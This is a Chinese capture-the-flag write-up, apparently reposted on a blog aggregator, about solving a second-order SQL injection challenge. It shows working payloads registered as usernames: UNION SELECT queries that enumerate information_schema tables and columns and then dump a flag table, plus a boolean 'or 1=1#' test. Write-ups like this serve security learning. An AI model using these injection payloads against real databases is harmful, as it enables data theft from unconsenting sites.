当前位置: 首页 > news >正文

October 2019 Twice SQL Injection

news 2025/8/28 7:32:19

标题告诉我们考的是二次注入,一共四个功能,注册、登录、显示info、修改info。
寻找注入点:

  1. 注册时会查询数据库检查是否已注册,会回显注册失败,猜测查询语句是select * from users where username='[Username]',检验一下:Username: n’or 1=1#,发现注册成功,不符合预期。无法利用。
  2. 登陆时没有任何回显。无法利用。
  3. 显示info时推测查询语句是select info from users where username='[Username]',因为考点是二次注入,所以大概率是这种情况。直接注册用户, Username: no’union select database()#,登录后发现显示了数据库。
    在这里插入图片描述
  4. 接下来重复过程。
    Username: no’union select group_concat(table_name)from information_schema.tables where table_schema=database()#
    在这里插入图片描述
    Username: no’union select group_concat(column_name)from information_schema.columns where table_schema=database() and table_name=“flag”#
    在这里插入图片描述
    Username: no’union select group_concat(flag) from flag#
    在这里插入图片描述

总结

基础的二次注入,先找到所有需要查询数据库的地方,然后测试回显,猜测查询方式。
注册的时候可能是对用户名进行转义,不然应该可以使用布尔盲注no'or 1=1#,通过回显是否注册成功进行盲注。

http://www.dtcms.com/a/353407.html

相关文章:

  • Qt图片上传系统的设计与实现:从客户端到服务器的完整方案
  • 对比视频处理单元(VPU)、图形处理器(GPU)与中央处理器(CPU)
  • 多模态模型如何处理和理解图片
  • PPT处理控件Aspose.Slides教程:在.NET中开发SVG到EMF的转换器
  • STM32学习日记
  • 替身演员的艺术:pytest-mock 从入门到飙戏
  • Java基础 8.27
  • 如何使用windows实现与iphone的隔空投送(AirDrop)
  • 【Docker基础】Docker-compose数据持久化与卷管理:深入解析docker volume命令集
  • 【重学MySQL】八十九、窗口函数的分类和使用
  • Mysql杂志(三)
  • 【46页PPT】公司数字化转型规划与实践(附下载方式)
  • 学习Python中Selenium模块的基本用法(7:元素操作-1)
  • 应变片与分布式光纤传感:核心差异与选型指南
  • 极海发布APM32F425/427系列高性能MCU:助力工业应用升级
  • laravel学习并连接mysql数据库
  • Linux 软件编程(十二)网络编程:TCP 并发服务器构建与 IO 多路复用
  • redis---set详解
  • Tortoisegit配置ssh教程
  • Vue3 新特性 defineModel 全面解析:让 v-model 写法更优雅
  • 项目智能家居---OrangePi全志H616
  • GitHub 宕机自救指南:保障开发工作连续性
  • 蓝桥杯算法之基础知识(3)——Python的idle的快捷键设置(idle改键)
  • 信任,AI+或人机环境系统智能的纽带
  • 深入解析EDCA通道与参数配置:优化Wi-Fi服务质量的关键策略
  • 新手向:网络编程完全指南
  • Jetson 分区知识全解与 OTA 升级实战
  • Containerd 安装与配置指南
  • 如何验证二叉搜索树:两种高效方法详解
  • 光伏设计平台:按组件数量铺设光伏板,精准控制投资成本